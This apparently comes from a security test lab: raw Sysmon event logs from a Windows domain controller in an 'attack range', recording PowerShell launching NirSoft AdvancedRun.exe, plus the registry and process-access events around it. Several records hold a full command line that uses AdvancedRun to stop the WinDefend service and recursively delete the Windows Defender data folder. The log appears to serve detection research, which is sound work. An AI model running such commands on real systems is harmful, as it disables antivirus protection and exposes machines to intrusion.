22:16:42.740{834264DD-DF4A-61E9-D161-000000002402}1668C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path $env:TEMP\advancedrun\advancedrun.exe\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-0DBE-61E7-0375-0C0000000000}0xc75032HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-0DCB-61E7-F800-000000002402}5296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000002962145Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:16:31.671{834264DD-DF3F-61E9-CE61-000000002402}2648C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path 
$env:TEMP\advancedrun\advancedrun.exe\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-0DBE-61E7-0375-0C0000000000}0xc75032HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-0DCB-61E7-F800-000000002402}5296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 11241100x80000000000000002962137Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:16:31.571{834264DD-DF3E-61E9-CD61-000000002402}5000C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe2022-01-20 22:16:31.571ATTACKRANGE\Administrator 154100x80000000000000002961227Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:16:30.160{834264DD-DF3E-61E9-CC61-000000002402}2256C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path $env:TEMP\advancedrun\advancedrun.exe\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-0DBE-61E7-0375-0C0000000000}0xc75032HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-0DCB-61E7-F800-000000002402}5296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000002959234Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:15:21.442{834264DD-DEF9-61E9-C061-000000002402}7968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path $env:TEMP\advancedrun\advancedrun.exe\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-0DBE-61E7-0375-0C0000000000}0xc75032HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-0DCB-61E7-F800-000000002402}5296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 11241100x80000000000000002959226Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:15:21.330{834264DD-DEF8-61E9-BF61-000000002402}2276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe2022-01-20 22:02:13.036ATTACKRANGE\Administrator 23542300x80000000000000002959225Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:15:21.314{834264DD-DEF8-61E9-BF61-000000002402}2276ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8truetrue 154100x80000000000000002958315Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:15:19.860{834264DD-DEF7-61E9-BE61-000000002402}6944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft 
CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path $env:TEMP\advancedrun\advancedrun.exe\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-0DBE-61E7-0375-0C0000000000}0xc75032HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-0DCB-61E7-F800-000000002402}5296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000002957970Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:15:16.220{834264DD-DEF4-61E9-BB61-000000002402}8132C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$env:TEMP\advancedrun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run $env:TEMP\advancedrun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-0DBE-61E7-0375-0C0000000000}0xc75032HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-0DCB-61E7-F800-000000002402}5296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000002956502Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:14:01.965{834264DD-DEA9-61E9-AD61-000000002402}8012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$env:TEMP\advancedrun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run $env:TEMP\advancedrun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-0DBE-61E7-0375-0C0000000000}0xc75032HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-0DCB-61E7-F800-000000002402}5296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000002956089Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:13:51.504{834264DD-DE9F-61E9-AA61-000000002402}7940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$env:TEMP\x07dvancedrun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run $env:TEMP\x07dvancedrun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} 
C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-0DBE-61E7-0375-0C0000000000}0xc75032HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-0DCB-61E7-F800-000000002402}5296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000002955141Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:13:05.114{834264DD-DE71-61E9-A061-000000002402}6188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$env:TEMP\advancedrun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run $env:TEMP\advancedrun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-0DBE-61E7-0375-0C0000000000}0xc75032HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-0DCB-61E7-F800-000000002402}5296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000002954401Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:12:58.607{834264DD-DE6A-61E9-9D61-000000002402}4388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft 
CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path $env:TEMP\advancedrun\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-0DBE-61E7-0375-0C0000000000}0xc75032HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-0DCB-61E7-F800-000000002402}5296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 11241100x80000000000000002944148Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:02:13.036{834264DD-0DCB-61E7-F800-000000002402}5296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe2022-01-20 22:02:13.036ATTACKRANGE\Administrator 13241300x80000000000000002926120Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 21:40:36.161{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe\REGISTRY\A\{3b53e57c-2a0c-3c13-3fd7-468e6d87b206}\Root\InventoryApplicationFile\advancedrun.exe|da2ad31d568bac4\UsnQWORD (0x00000000-0x14613300)NT AUTHORITY\SYSTEM 13241300x80000000000000002926119Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 21:40:36.161{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe\REGISTRY\A\{3b53e57c-2a0c-3c13-3fd7-468e6d87b206}\Root\InventoryApplicationFile\advancedrun.exe|da2ad31d568bac4\LanguageDWORD (0x00000409)NT AUTHORITY\SYSTEM 13241300x80000000000000002926118Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 
21:40:36.161{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe\REGISTRY\A\{3b53e57c-2a0c-3c13-3fd7-468e6d87b206}\Root\InventoryApplicationFile\advancedrun.exe|da2ad31d568bac4\SizeQWORD (0x00000000-0x0002a178)NT AUTHORITY\SYSTEM 13241300x80000000000000002926117Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 21:40:36.161{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe\REGISTRY\A\{3b53e57c-2a0c-3c13-3fd7-468e6d87b206}\Root\InventoryApplicationFile\advancedrun.exe|da2ad31d568bac4\AppxPackageRelativeId(Empty)NT AUTHORITY\SYSTEM 13241300x80000000000000002926116Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 21:40:36.161{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe\REGISTRY\A\{3b53e57c-2a0c-3c13-3fd7-468e6d87b206}\Root\InventoryApplicationFile\advancedrun.exe|da2ad31d568bac4\AppxPackageFullName(Empty)NT AUTHORITY\SYSTEM 13241300x80000000000000002926115Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 21:40:36.161{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe\REGISTRY\A\{3b53e57c-2a0c-3c13-3fd7-468e6d87b206}\Root\InventoryApplicationFile\advancedrun.exe|da2ad31d568bac4\BinProductVersion1.5.0.13NT AUTHORITY\SYSTEM 13241300x80000000000000002926114Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 21:40:36.161{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe\REGISTRY\A\{3b53e57c-2a0c-3c13-3fd7-468e6d87b206}\Root\InventoryApplicationFile\advancedrun.exe|da2ad31d568bac4\LinkDate11/22/2021 09:28:48NT AUTHORITY\SYSTEM 13241300x80000000000000002926113Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 
21:40:36.161{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe\REGISTRY\A\{3b53e57c-2a0c-3c13-3fd7-468e6d87b206}\Root\InventoryApplicationFile\advancedrun.exe|da2ad31d568bac4\ProductVersion1.50NT AUTHORITY\SYSTEM 13241300x80000000000000002926112Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 21:40:36.161{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe\REGISTRY\A\{3b53e57c-2a0c-3c13-3fd7-468e6d87b206}\Root\InventoryApplicationFile\advancedrun.exe|da2ad31d568bac4\ProductNameadvancedrunNT AUTHORITY\SYSTEM 13241300x80000000000000002926111Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 21:40:36.161{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe\REGISTRY\A\{3b53e57c-2a0c-3c13-3fd7-468e6d87b206}\Root\InventoryApplicationFile\advancedrun.exe|da2ad31d568bac4\BinaryTypepe64_amd64NT AUTHORITY\SYSTEM 13241300x80000000000000002926110Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 21:40:36.161{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe\REGISTRY\A\{3b53e57c-2a0c-3c13-3fd7-468e6d87b206}\Root\InventoryApplicationFile\advancedrun.exe|da2ad31d568bac4\BinFileVersion1.5.0.13NT AUTHORITY\SYSTEM 13241300x80000000000000002926109Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 21:40:36.161{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe\REGISTRY\A\{3b53e57c-2a0c-3c13-3fd7-468e6d87b206}\Root\InventoryApplicationFile\advancedrun.exe|da2ad31d568bac4\Version1.50NT AUTHORITY\SYSTEM 13241300x80000000000000002926108Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 
21:40:36.161{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe\REGISTRY\A\{3b53e57c-2a0c-3c13-3fd7-468e6d87b206}\Root\InventoryApplicationFile\advancedrun.exe|da2ad31d568bac4\PublishernirsoftNT AUTHORITY\SYSTEM 13241300x80000000000000002926107Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 21:40:36.161{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe\REGISTRY\A\{3b53e57c-2a0c-3c13-3fd7-468e6d87b206}\Root\InventoryApplicationFile\advancedrun.exe|da2ad31d568bac4\OriginalFileNameadvancedrun.exeNT AUTHORITY\SYSTEM 13241300x80000000000000002926106Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 21:40:36.161{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe\REGISTRY\A\{3b53e57c-2a0c-3c13-3fd7-468e6d87b206}\Root\InventoryApplicationFile\advancedrun.exe|da2ad31d568bac4\NameAdvancedRun.exeNT AUTHORITY\SYSTEM 13241300x80000000000000002926105Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 21:40:36.161{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe\REGISTRY\A\{3b53e57c-2a0c-3c13-3fd7-468e6d87b206}\Root\InventoryApplicationFile\advancedrun.exe|da2ad31d568bac4\LongPathHashadvancedrun.exe|da2ad31d568bac4NT AUTHORITY\SYSTEM 13241300x80000000000000002926104Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 21:40:36.161{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe\REGISTRY\A\{3b53e57c-2a0c-3c13-3fd7-468e6d87b206}\Root\InventoryApplicationFile\advancedrun.exe|da2ad31d568bac4\LowerCaseLongPathc:\users\administrator\downloads\advancedrun-x64\advancedrun.exeNT AUTHORITY\SYSTEM 13241300x80000000000000002926103Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 
21:40:36.161{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe\REGISTRY\A\{3b53e57c-2a0c-3c13-3fd7-468e6d87b206}\Root\InventoryApplicationFile\advancedrun.exe|da2ad31d568bac4\FileId00001c742086aebb17ba409f9f2510560c2dcde6d45aNT AUTHORITY\SYSTEM 13241300x80000000000000002926102Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 21:40:36.161{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe\REGISTRY\A\{3b53e57c-2a0c-3c13-3fd7-468e6d87b206}\Root\InventoryApplicationFile\advancedrun.exe|da2ad31d568bac4\ProgramId0006a2b5cbd9a8f44e2a129f3d44e765e36a00000904NT AUTHORITY\SYSTEM 12241200x80000000000000002926101Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-20 21:40:36.161{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe\REGISTRY\A\{3b53e57c-2a0c-3c13-3fd7-468e6d87b206}\Root\InventoryApplicationFile\advancedrun.exe|da2ad31d568bac4NT AUTHORITY\SYSTEM 13241300x80000000000000002926086Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 21:40:36.153{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeBinary DataNT AUTHORITY\SYSTEM 534500x80000000000000002926049Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:34.153{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeATTACKRANGE\Administrator 11241100x80000000000000002926048Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
21:40:34.144{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.cfg2022-01-20 21:40:34.144ATTACKRANGE\Administrator 10341000x80000000000000002926000Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:32.211{834264DD-0DC0-61E7-ED00-000000002402}46444776C:\Windows\Explorer.EXE{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\NPSMDesktopProvider.dll+1be4a|C:\Windows\System32\NPSMDesktopProvider.dll+1226e|C:\Windows\System32\NPSMDesktopProvider.dll+12835|C:\Windows\System32\NPSMDesktopProvider.dll+67dc|C:\Windows\System32\TwinUI.dll+7c9e8|C:\Windows\System32\TwinUI.dll+75fcd|C:\Windows\System32\TwinUI.dll+75ba3|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002925995Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
21:40:32.207{834264DD-0DC0-61E7-ED00-000000002402}46441688C:\Windows\Explorer.EXE{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002925994Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:32.207{834264DD-0DC0-61E7-ED00-000000002402}46441688C:\Windows\Explorer.EXE{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002925993Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
21:40:32.207{834264DD-0DC0-61E7-ED00-000000002402}46441688C:\Windows\Explorer.EXE{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002925992Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:32.207{834264DD-0DC0-61E7-ED00-000000002402}46445028C:\Windows\Explorer.EXE{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002925991Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
